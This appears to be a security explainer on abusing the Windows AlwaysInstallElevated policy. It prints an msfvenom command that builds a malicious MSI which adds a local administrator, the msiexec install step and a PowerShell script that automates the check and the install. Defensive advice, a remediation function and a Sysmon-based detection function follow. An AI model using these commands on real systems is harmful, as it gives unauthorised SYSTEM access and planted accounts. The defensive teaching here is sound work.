AlwaysInstallElevated is a Windows policy setting that, when enabled, lets any user install Windows Installer (MSI) packages with SYSTEM privileges. It is meant to let standard users install approved software, but if both the machine and user registry keys are set to 1, an attacker simply builds a malicious MSI and installs it to get a SYSTEM shell. It is one of the fastest Windows escalations when present, and the check is two registry queries.
What AlwaysInstallElevated is
AlwaysInstallElevated is a Windows Installer policy, exposed in Group Policy as "Always install with elevated privileges" (Administrative Templates > Windows Components > Windows Installer) under both Computer Configuration and User Configuration. When both halves are enabled, the Windows Installer service (which already runs as LocalSystem) performs every MSI installation with elevated privileges, even when a standard user launches it. Administrators sometimes enable it so users can install approved software without admin rights; Microsoft's own policy description warns that it is a security risk.
The problem is that it does not restrict which MSI runs elevated: there is no signature, publisher or path requirement. If the policy is on, any package, including one the attacker crafts in a user-writable directory, installs as SYSTEM, and any custom action inside it executes as SYSTEM too.
The abuse and payload
The attacker checks the two registry values, then installs a crafted MSI:
- Check both values (both must be REG_DWORD 1; the machine and user halves of the policy each write one):
  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  If either query reports the key or value as missing, the policy is not in effect and the rest does not work.
- Build a malicious MSI (the command is wrapped in cmd.exe /c so that the && chain is honoured; the exec payload hands the string to WinExec, which does not interpret && by itself):
  msfvenom -p windows/x64/exec CMD="cmd.exe /c net user hacker P@ss123! /add && net localgroup administrators hacker /add" -f msi -o evil.msi
- Install it as the low-privileged user:
  msiexec /quiet /qn /i evil.msi
- The custom action runs as SYSTEM, creating a local administrator (or, with a different payload, a reverse shell). The install itself then reports failure and rolls back, which is expected and does not undo what the payload already did.
PowerSploit's PowerUp automates the same steps (Get-RegistryAlwaysInstallElevated and Write-UserAddMSI). This is a widely documented technique; it is shown here so defenders can recognise it and test their own estate for it.
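The check-and-install procedure above as one PowerShell script, added here as an example and not taken from the original page or from any tool it mentions. It assumes the MSI has already been built (for instance with the msfvenom command above) and that its path is supplied as a parameter; a missing registry key or value is treated as "not set", which is the correct reading because the policy only takes effect when both values are 1.

```powershell
# Added example: read both AlwaysInstallElevated values and, only if both are 1,
# hand an MSI to msiexec so the Windows Installer service runs it as SYSTEM.
# Assumes the MSI already exists at -MsiPath (hypothetical path in the usage line).

function Get-AlwaysInstallElevatedState {
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $state  = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $key   = "${hive}:\$subKey"
        $value = $null
        if (Test-Path -Path $key) {
            # -ErrorAction SilentlyContinue: an absent value yields $null, i.e. "not set"
            $value = (Get-ItemProperty -Path $key -Name 'AlwaysInstallElevated' `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state[$hive] = $value
    }
    [pscustomobject]@{
        HKLM       = $state['HKLM']
        HKCU       = $state['HKCU']
        # The policy is only in effect when BOTH halves are enabled (DWORD 1)
        Vulnerable = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
    }
}

function Invoke-ElevatedMsi {
    param([Parameter(Mandatory)][string]$MsiPath)

    $check = Get-AlwaysInstallElevatedState
    if (-not $check.Vulnerable) {
        Write-Host "AlwaysInstallElevated not fully enabled (HKLM=$($check.HKLM), HKCU=$($check.HKCU)); nothing to abuse."
        return $check
    }
    if (-not (Test-Path -Path $MsiPath)) {
        throw "MSI not found: $MsiPath"
    }

    # /i = install, /quiet /qn = no UI. A payload MSI runs its custom action as SYSTEM
    # and then fails/rolls back, so a non-zero msiexec exit code is the normal outcome.
    $proc = Start-Process -FilePath 'msiexec.exe' `
        -ArgumentList '/quiet', '/qn', '/i', "`"$MsiPath`"" -Wait -PassThru
    Write-Host "msiexec exited with code $($proc.ExitCode) (failure/rollback is expected for a payload MSI)"
    return $check
}

# Usage (hypothetical path):
# Get-AlwaysInstallElevatedState
# Invoke-ElevatedMsi -MsiPath 'C:\Users\Public\evil.msi'
```

Running Get-AlwaysInstallElevatedState on its own is the non-destructive audit a defender can drop into a baseline script; the Vulnerable field is what to alert on.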
How to defend
- Do not enable AlwaysInstallElevated. It is effectively a SYSTEM-for-any-user switch, and no combination of other Installer settings makes it safe.
- Audit both registry values and set the policy to Disabled (or Not Configured) under both Computer Configuration and User Configuration via Group Policy, so the values read 0 or are absent across the estate. Setting only one half is enough to break the technique, but fix both so a later change to one does not silently re-enable it.
- Use proper software-deployment tooling (a management agent or a per-user elevation broker) that installs approved packages with controlled privileges instead of blanket elevation.
- Apply application control (allow-listing) so unexpected MSIs cannot run; Windows Installer rules in AppLocker or WDAC cover packages launched through msiexec.
- Monitor for msiexec installing packages from user-writable locations (Downloads, Temp, ProgramData) and for SYSTEM-level child processes of msiexec.exe such as cmd.exe, powershell.exe or net.exe. Process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command lines) and the MsiInstaller events in the Application log record who launched which package and what it spawned.
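The remediation and the two monitoring signals from the list above, as an added PowerShell example that is not part of the original page. Disable-AlwaysInstallElevated is a local fix (in a domain, set the Group Policy to Disabled instead); Find-MsiexecAbuse runs the detection logic over process-creation records shaped like Sysmon Event ID 1 data. The sample records at the end are constructed for the demonstration, not real telemetry; Get-SysmonProcessEvents shows how to produce the same shape from a live Sysmon log.

```powershell
# Added example: disable the policy locally and hunt for msiexec abuse in process telemetry.
# Field names (Image, ParentImage, User, CommandLine, UtcTime) follow Sysmon Event ID 1.

function Disable-AlwaysInstallElevated {
    # Local remediation; domain-wide, set "Always install with elevated privileges" to
    # Disabled under both Computer and User Configuration via GPO instead.
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\$subKey"
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        New-ItemProperty -Path $key -Name 'AlwaysInstallElevated' -PropertyType DWord -Value 0 -Force | Out-Null
    }
}

function Get-SysmonProcessEvents {
    # Flatten live Sysmon Event ID 1 records into objects with one property per EventData field.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction Stop |
        ForEach-Object {
            $fields = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
            [pscustomobject]$fields
        }
}

function Find-MsiexecAbuse {
    param([Parameter(Mandatory)][object[]]$Events)

    $userWritable = '(?i)\\(Users|ProgramData|Windows\\Temp)\\'
    foreach ($e in $Events) {
        $reasons = @()
        # Signal 1: msiexec installing a package that lives in a user-writable path
        if ($e.Image -match '(?i)\\msiexec\.exe$' -and
            $e.CommandLine -match '(?i)(/i|/package)\s' -and
            $e.CommandLine -match $userWritable) {
            $reasons += 'msiexec install from user-writable path'
        }
        # Signal 2: SYSTEM-level shell or account tool spawned by msiexec.exe (custom action)
        if ($e.ParentImage -match '(?i)\\msiexec\.exe$' -and
            $e.User -eq 'NT AUTHORITY\SYSTEM' -and
            $e.Image -match '(?i)\\(cmd|powershell|net|net1)\.exe$') {
            $reasons += 'SYSTEM child of msiexec.exe'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time        = $e.UtcTime
                User        = $e.User
                Image       = $e.Image
                CommandLine = $e.CommandLine
                Why         = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records (not real telemetry): one user-launched install from Downloads,
# the service-side msiexec that the Installer service spawns, the SYSTEM custom action, and a benign child.
$sample = @(
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:01'; User = 'CORP\alice';            Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\explorer.exe';           CommandLine = 'msiexec /quiet /qn /i C:\Users\alice\Downloads\evil.msi' },
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:02'; User = 'NT AUTHORITY\SYSTEM';   Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\System32\services.exe'; CommandLine = 'C:\Windows\system32\msiexec.exe /V' },
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:03'; User = 'NT AUTHORITY\SYSTEM';   Image = 'C:\Windows\System32\cmd.exe';     ParentImage = 'C:\Windows\System32\msiexec.exe';  CommandLine = 'cmd.exe /c net user hacker P@ss123! /add && net localgroup administrators hacker /add' },
    [pscustomobject]@{ UtcTime = '2024-01-01 10:05:00'; User = 'NT AUTHORITY\SYSTEM';   Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\System32\services.exe'; CommandLine = 'msiexec /i C:\Windows\ccmcache\a1\Approved.msi /qn' }
)

Find-MsiexecAbuse -Events $sample | Format-Table -AutoSize
# Expected: the first record (install from Downloads) and the third (SYSTEM cmd.exe under msiexec) are flagged;
# the service-side msiexec and the install from the management cache are not.
```

Legitimate installers also spawn SYSTEM child processes from msiexec.exe, so on a real estate Signal 2 needs an allow-list of known packages (the product name from the MsiInstaller Application-log events is a good join key); Signal 1 is the higher-fidelity indicator on hosts where software is only ever deployed from a management cache.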